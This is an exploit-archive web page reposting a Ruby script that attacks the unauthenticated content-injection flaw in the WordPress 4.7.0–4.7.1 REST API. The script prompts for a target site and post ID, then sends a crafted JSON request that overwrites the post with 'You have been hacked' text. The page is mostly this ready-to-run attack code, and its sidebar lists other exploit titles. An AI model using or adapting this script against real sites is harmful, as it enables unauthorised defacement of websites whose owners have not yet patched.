首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Ruby)
来源:https://blog.sucuri.net 作者:Jaiswal 发布时间:2017-02-03  
# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client
# Lang : Ruby
 
 
require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
 
    "id" => "#{postid}justrawdata",
    "title" => "You have been hacked",
    "content" => "Hacked please update your wordpress version"
 
 
  }.to_json,
  :content_type => :json,
  :accept => :json
) {|response, request, result| response }
if(response.code == 200)
 
puts "Done! '#{targeturi}/index.php?p=#{postid}'"
 
 
else
puts "This site is not Vulnerable"
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WordPress 4.7.0/4.7.1 - Unauth
·TrueOnline / ZyXEL P660HN-T v1
·Microsoft Windows 10 - SMBv3 T
·TrueOnline / Billion 5200W-T R
·Apple WebKit - Type Confusion
·TrueOnline / ZyXEL P660HN-T v2
·Apple WebKit - 'HTMLKeygenElem
·Cisco WebEx Chrome Extension R
·Google Chrome - 'HTMLKeygenEle
·CUPS < 2.0.3 - Remote Command
·Apple WebKit - 'HTMLFormElemen
·Netwave IP Camera - Password D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved